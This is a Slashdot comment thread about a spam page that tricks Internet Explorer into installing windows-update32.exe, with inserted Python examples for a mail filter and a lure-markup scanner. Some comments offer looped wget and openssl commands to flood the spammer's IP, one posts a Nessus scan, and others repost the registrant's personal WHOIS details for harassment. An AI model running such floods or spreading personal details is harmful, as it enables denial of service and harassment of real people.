    It drops w32.exe in Prefetch and System32.

    Removing its startup entries in Safe Mode with HijackThis and deleting the EXEs will fix it.

    --

    Striking fear in the authors of godawful fanfiction, I am here, appearing in darkness, Tuxedo Jack!
  98. Re:Slightly OT-Malicious spam opt-outs and MYPOINT by Black+Acid · · Score: 1
    Destination filtering is an excellent idea, but unfortunately Gmail doesn't let you filter based on what the to header is not set to. I file all mail sent to blackacid@gmail.com into a junk mail folder, and only give out addresses such as blackacid+slashdot@gmail.com. I don't read any email sent without the plus sign.

    The problem is many spammers set the to header to something totally bogus, or ignore it completely, yet the mail still arrives in my inbox. If only Google would allow more advanced filtering techniques, to header filtering could be much more effective. Of course, those that run their own mail server can already reap the benefits of this kind of filtering, but I know many people would enjoy using this feature with Google Mail.
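
Added example (not part of any comment above): the +suffix scheme described in comments 92 and 98, as a Python filter that splits the local part, reports which tag a message was sent to, and files anything untagged as junk. It reads the server-written Delivered-To and X-Original-To headers before To, because comment 98 notes the To header can be bogus; the presence of those headers, the mailbox user@example.com and all four messages are assumptions constructed for this example.

```python
from email import message_from_string
from email.utils import getaddresses

# Checked in order. Delivered-To / X-Original-To are written by the receiving
# server (assumption: yours adds one of them); To and Cc are sender-controlled.
RECIPIENT_HEADERS = ("Delivered-To", "X-Original-To", "To", "Cc")

MAILBOX = "user@example.com"  # constructed mailbox, never given out untagged


def split_plus_address(address):
    """Return (base, tag, domain); tag is None when there is no +suffix."""
    local, _, domain = address.strip().rpartition("@")
    base, sep, tag = local.partition("+")
    return base.lower(), (tag.lower() if sep else None), domain.lower()


def classify(raw_message, mailbox=MAILBOX):
    """File a message by the tag it was addressed to.

    Tagged mail goes to the inbox and records the tag, so a leaked tag can be
    traced to whoever it was given to. Everything else is junk.
    """
    want_base, _, want_domain = split_plus_address(mailbox)
    msg = message_from_string(raw_message)
    saw_bare = False
    for header in RECIPIENT_HEADERS:
        for _name, addr in getaddresses(msg.get_all(header, [])):
            base, tag, domain = split_plus_address(addr)
            if (base, domain) != (want_base, want_domain):
                continue
            if tag:
                return {"folder": "inbox", "tag": tag, "seen_in": header}
            saw_bare = True
    reason = "untagged address" if saw_bare else "mailbox not named in any header"
    return {"folder": "junk", "tag": None, "reason": reason}


# Constructed sample messages.
TAGGED = "To: user+slashdot@example.com\nSubject: reply\n\nhello\n"
BOGUS_TO = (
    "Delivered-To: user+mypoints@example.com\n"
    'To: "Lucky Winner" <prizes@invalid.example>\n'
    "Subject: you won\n\nclick here\n"
)
BARE = "To: user@example.com\nSubject: offer\n\nbuy now\n"
NOT_NAMED = "To: friends@invalid.example\nSubject: hi\n\nbuy now\n"

if __name__ == "__main__":
    for name, raw in (("tagged", TAGGED), ("bogus To", BOGUS_TO),
                      ("bare", BARE), ("not named", NOT_NAMED)):
        print(name, classify(raw))
```
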

  99. First fix malicious links in Slashdot! by microsopht · · Score: 1
    Forget "spam out links". First fix malicious links in Slashdot! You might have seen the dubious "Gmail invites" links posted at the beginning of the comments. In spite of having a Gmail account, stupid me, I clicked on the link to do an "analysis" of the Gmail invite address!!

    Too bad, Slashdot too gave the site address as [google] after the link... It only opened a porn page, with shaking windows. Thank god I was using Firefox. I don't know what would have happened had I seen it with Internet Explorer.

    Even better, I had images OFF when I visited. So kinda saved. But I would like to know if clicking on that link would cause any further harm to my computer.

    And since the caption of the site name that Slashdot provides has been proved useless, how can I find the name of the real site that link will take me to?

    Thanks.

    Are Malicious links the bane of slashdot?

    1. Re:First fix malicious links in Slashdot! by Anonymous Coward · · Score: 0

      This has just recently been fixed in the past 30 minutes. Those "trick" links won't appear anymore so you are safe to click on links again.

    2. Re:First fix malicious links in Slashdot! by microsopht · · Score: 1

      You think you are intelligent and all others stupid?
      perhaps you will be taught

  100. Why not use Slashdot effect for once? by mi · · Score: 1
    Put the proper link (full URL without the silly spaces) to the spammer's site and let slashdotters bring the site to its knees!

    Register may have some silly users, but all visitors of this site are, of course, cool and don't use IE, do they?

    --
    In Soviet Washington the swamp drains you.
    1. Re:Why not use Slashdot effect for once? by a24061 · · Score: 1
      Put the proper link (full URL without the silly spaces) to the spammer's site and let slashdotters bring the site to its knees!

      wget in a loop in a shell script?

    2. Re:Why not use Slashdot effect for once? by mi · · Score: 1
      wget in a loop in a shell script?

      (I'd use fetch, but that's unimportant.)

      It is your CPU and bandwidth against the spammer's. A single machine would not do. You need thousands of Slashdot visitors to click on the link at (almost) the same time. For that, the proper link has to be on the front page...

      --
      In Soviet Washington the swamp drains you.
  101. Why do you provide links? by microsopht · · Score: 1
    The comments page for this story has become a real security nightmare on Slashdot! Why do you have to provide direct links to the windows update .exe file? [That too, so many are providing it, as if it is a sig.]


    And another guy is saying "what if the evil guys are reading SD and add opera and mozilla exploits" [not exact quote]. And then goes on to provide links to exploits in Mozilla and Opera [a Google search link too].

    By giving links to flaws in Opera and Mozilla, you want to help the evil guys who are reading Slashdot?

    Now don't argue "You have to be stupid to click on those links", "I am annoyed how people click those links", etc.
    This may be Slashdot, but still littering the comments page with unsafe links does no good!

    Links are to be provided where required. Not wherever possible.

  102. Use SSL version for maximum effect by Anonymous Coward · · Score: 2, Interesting

    The brain-dead apache admin that put this box together made all the pages available over the SSL connection. So from your browser (preferably FireFox) use this link.

    https://61.218.79.53/d/

    Or if you have OpenSSL on your box (most *nix boxes do or you can download it from www.openssl.org) use this line in your favorite looped script:

    openssl s_client -connect 61.218.79.53:443

    This sets up an SSL connection. Even if they are using a HSM (Hardware Security Module) they cannot service more than 300-400 or so connections/sec with an HSM rated for 600 connections/sec. They aren't using an HSM, so it shouldn't take more than about 50-100 of these per second to fully tax the processor.

    1. Re:Use SSL version for maximum effect by dickrichardv8 · · Score: 1

      I just ordered the economy size order of Desiel Power using the sample credit card number they suggested. Do you think I will get it?

  103. Domain information by Pig+Hogger · · Score: 0, Redundant
    Here is the domain registration information.

    Since they use a YAHOO e-mail address for registration, they are worthy of being disconnected upon complaining to YAHOO.

    Hint: complain to yahoo with the subject line: "[UNAUTHORIZED COMMERCIAL USE] win2save@yahoo.com" so they can see it quicker.

    Domain Name XCELENT.BIZ
    Domain ID D7752456-BIZ
    Sponsoring Registrar CSL COMPUTER SERVICE (D.B.A. JOKER.COM)
    Sponsoring Registrar IANA ID 113
    Domain Status clientTransferProhibited
    Registrant ID CNEU-105661
    Registrant Name Anandan Krishan
    Registrant Organization Iscon & Krishan
    Registrant Address1 Suite 50-12
    Registrant Address2 Jalan Yap Kwan Seng.
    Registrant City Kuala Lumpur
    Registrant State/Province KL
    Registrant Postal Code 50450
    Registrant Country Malaysia
    Registrant Country Code MY
    Registrant Phone Number +603.27756842
    Registrant Facsimile Number +603.27756642
    Registrant Email win2save@yahoo.com
    Administrative Contact ID CNEU-105617
    Administrative Contact Name Anandan Krishan
    Administrative Contact Organization Iscon & Krishan
    Administrative Contact Address1 Suite 50-12
    Administrative Contact Address2 Jalan Yap Kwan Seng.
    Administrative Contact City Kuala Lumpur
    Administrative Contact State/Province KL
    Administrative Contact Postal Code 50450
    Administrative Contact Country Malaysia
    Administrative Contact Country Code MY
    Administrative Contact Phone Number +603.27756842
    Administrative Contact Facsimile Number +603.27756642
    Administrative Contact Email win2save@yahoo.com
    Billing Contact ID CNEU-105617
    Billing Contact Name Anandan Krishan
    Billing Contact Organization Iscon & Krishan
    Billing Contact Address1 Suite 50-12
    Billing Contact Address2 Jalan Yap Kwan Seng.
    Billing Contact City Kuala Lumpur
    Billing Contact State/Province KL
    Billing Contact Postal Code 50450
    Billing Contact Country Malaysia
    Billing Contact Country Code MY
    Billing Contact Phone Number +603.27756842
    Billing Contact Facsimile Number +603.27756642
    Billing Contact Email win2save@yahoo.com
    Technical Contact ID CNEU-105617
    Technical Contact Name Anandan Krishan
    Technical Contact Organization Iscon & Krishan
    Technical Contact Address1 Suite 50-12
    Technical Contact Address2 Jalan Yap Kwan Seng.
    Technical Contact City Kuala Lumpur
    Technical Contact State/Province KL
    Technical Contact Postal Code 50450
    Technical Contact Country Malaysia
    Technical Contact Country Code MY
    Technical Contact Phone Number +603.27756842
    Technical Contact Facsimile Number +603.27756642
    Technical Contact Email win2save@yahoo.com
    Name Server NS1.GRAITHBOADER.BIZ
    Name Server NS2.GRAITHBOADER.BIZ
    Name Server NS2.TIKONDES.BIZ
    Created by Registrar CSL COMPUTER SERVICE (D.B.A. JOKER.COM)
    Last Updated by Registrar CSL COMPUTER SERVICE (D.B.A. JOKER.COM)
    Domain Registration Date Wed Sep 15 03:53:27 GMT 2004
    Domain Expiration Date Wed Sep 14 23:59:59 GMT 2005
    Domain Last Updated Date Wed Sep 15 04:03:16 GMT 2004
  104. From the page source code... by Pig+Hogger · · Score: 1
    The real page is at "http://www.xce lent.biz/o/" but is hidden in a frameset so you can't see the real address.

    Here is a gem code snippet:

    function scrollRoot(y) {
    // probably the dumbest scrollbar emulation on this planet ;)
    frames["root"].scrollTo(0,(frames["root"].document.body.firstChild.offsetHeight/100*(y/document.getElementById("root").offsetHeight*100)));
    }
    The page tries to emulate a scroll bar; I got suspicious when the scroll bar did not work properly with my mouse wheel...

    Elsewhere in the code, it tries to download "http://www.xcelent.biz/o/windows-update32.exe" and execute it as an image... - but I can't download it as now, since it seems to be slashdotted...
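
Added example, not part of any comment above and not code from the page under discussion: a static check, in Python, for the markup pattern quoted in comments 81 and 104 (an `img` whose `dynsrc` or `src` names an executable, made transparent and wired to drag handlers). The extension list, severity labels and function names are assumptions of this example; the flagged tag in the sample is the one quoted in comment 81 (style abridged), and the rest of the sample is constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption: extensions this check treats as "executable".
EXECUTABLE_EXT = (".exe", ".scr", ".pif", ".bat", ".cmd")
DRAG_HANDLERS = {"ondragstart", "ondragend", "ondrag", "ondrop"}
OPACITY_RE = re.compile(r"opacity\s*[=:]\s*(\d*\.?\d+)", re.IGNORECASE)


def _is_executable_url(url):
    """True if the URL's path (query and fragment ignored) ends in an executable extension."""
    return urlsplit(url.strip()).path.lower().endswith(EXECUTABLE_EXT)


class LureScanner(HTMLParser):
    """Collects <img> tags that load an executable as if it were an image."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "img":
            return
        # HTMLParser already lower-cases tag and attribute names.
        attr = {name: (value or "") for name, value in attrs}
        sources = [n for n in ("dynsrc", "src") if _is_executable_url(attr.get(n, ""))]
        if not sources:
            return
        reasons = [f"{n} loads an executable: {attr[n]}" for n in sources]
        handlers = sorted(DRAG_HANDLERS & attr.keys())
        if handlers:
            reasons.append("drag handlers present: " + ", ".join(handlers))
        match = OPACITY_RE.search(attr.get("style", ""))
        if match and float(match.group(1)) == 0:
            reasons.append("element is fully transparent")
        self.findings.append({
            "line": self.getpos()[0],
            "attribute": sources[0],
            "target": attr[sources[0]],
            # "high" when the executable source is combined with another indicator.
            "severity": "high" if len(reasons) > len(sources) else "medium",
            "reasons": reasons,
        })


def scan_html(markup):
    """Return a list of findings for the given HTML text."""
    scanner = LureScanner()
    scanner.feed(markup)
    scanner.close()
    return scanner.findings


# Sample page: line 3 is the tag quoted in comment 81 (style abridged);
# the surrounding lines are constructed.
SAMPLE_PAGE = (
    '<html><body>\n'
    '<img src="logo.gif" alt="logo">\n'
    '<img id="dyn" dynsrc="./windows-update32.exe" border="0" '
    'style="filter:alpha(opacity=0);z-index:10;width:30 px;height:100%;'
    'position:absolute;right:0px;top:0;" '
    'onDragStart="startDrag();" onDragEnd="endDrag();" onClick="startClick()">\n'
    '</body></html>\n'
)

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_PAGE):
        print(finding["severity"], "line", finding["line"])
        for reason in finding["reasons"]:
            print("  -", reason)
```
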

  105. Spam Slashdot Link Triggers Malicious Color Scheme by Anonymous Coward · · Score: 0
  106. Huh? by haraldm · · Score: 2, Insightful

    Why anyone would use an e-mail program that allows clicking on something is beyond me. All the comfortable features that come with clickability have their price -- which in this case is far too high IMHO.

    --
    open (SIG, "</dev/zero"); $sig = <SIG>; close SIG;
  107. DNS trace - Lets give the address' owner a call by Honest+Man · · Score: 3, Informative

    Well, we could always call the owner of the site and tell him how much we 'so' appreciate his exploit being used on ppl.


    1. Re:DNS trace - Lets give the address' owner a call by a24061 · · Score: 1
      Well, we could always call the owner of the site and tell him how much we 'so' appreciate his exploit being used on ppl.
      ...
      Registrant Phone Number: +603.27756842

      That would be a good idea for a phone number in your own country (sorry if I'm wrongly assuming you're not in Malaysia), but who's willing to pay for overseas phone calls to complain about this?

  108. Nessus says by Anonymous Coward · · Score: 0

    Nessus Scan Report
    ------------------

    SUMMARY

    - Number of hosts which were alive during the test : 1
    - Number of security holes found : 3
    - Number of security warnings found : 16
    - Number of security notes found : 25

    TESTED HOSTS

    www.xcelent.biz (Security holes found)

    DETAILS

    + www.xcelent.biz :
    . List of open ports :
    o ftp (21/tcp) (Security notes found)
    o ssh (22/tcp) (Security hole found)
    o www (80/tcp) (Security notes found)
    o sunrpc (111/tcp) (Security notes found)
    o ldap (389/tcp) (Security notes found)
    o https (443/tcp) (Security warnings found)
    o windows-icfw (1002/tcp)
    o H.323/Q.931 (1720/tcp) (Security notes found)
    o mysql (3306/tcp) (Security hole found)
    o x11 (6000/tcp) (Security warnings found)
    o general/tcp (Security warnings found)
    o general/udp (Security notes found)
    o unknown (32768/tcp) (Security notes found)
    o unknown (32769/tcp) (Security warnings found)
    o sunrpc (111/udp) (Security notes found)
    o omad (32768/udp) (Security hole found)
    o general/icmp (Security notes found)

  109. MOD PARENT (with helpful address) UP! by bot24 · · Score: 1

    Demonstrating that your browser is vulnerable and telling you how to fix the problem is not malicious. The program installed doesn't do anything other than showing you that you can be affected by this exploit. Besides, who here actually uses IE?

  110. Opti-Mail Blam Guardian IBM did sheldon maillink? by tommywho70x · · Score: 0

    A simple solution for all us poor victims of the M$IntroNet Exploder Techno-Gadget QuickTreeViews:

    Do not click here.net[-]Auto-HYPHEN F10:EA8D:*ok*
    Do not open with Yahoo! Free)ze)MAIL Client[+]
    Do forward suspect message to your IAP[0]ISP[1]Let them get a put&call option M$MONEY-FYI-ADVISOR-YY-AA-HH-OO-!!-00.HTML+/-1.00S BC*XML*rss
    (?QUESTION MARK? What color is it??" ")
    Do not pass go. Do not collect $200. Do not assume your opinion is worth a SHIT=Stow High In Transit at Pleasure Boat Captains for Truth or the Landover Baptist Church - State Functions.

    Do not forget to remember memcopy.htm&#169(c)Copyright 1999 Microsoft Corporation. Legal Document.doc Legal Information NT Authorized meathook Web-based E-Mail mailto: info@prestongates.com Plus! SUN.COM/ENG/LAW/yours?
    JSP/PS/2.01 Mouse initialized by [(hp)]click[1]otis @ sprintmail.com [IBM]MOUSE.DRV=mouse.drv[0]

  111. Let the Spam bots spam HIM by Anonymous Coward · · Score: 0
    Anandan Krishan [some spam bot, please collect this].
    Thanking you,
    Anonymous Coward.

    Btw, I've often noticed that my DNS registration address is the one that gets the most spam.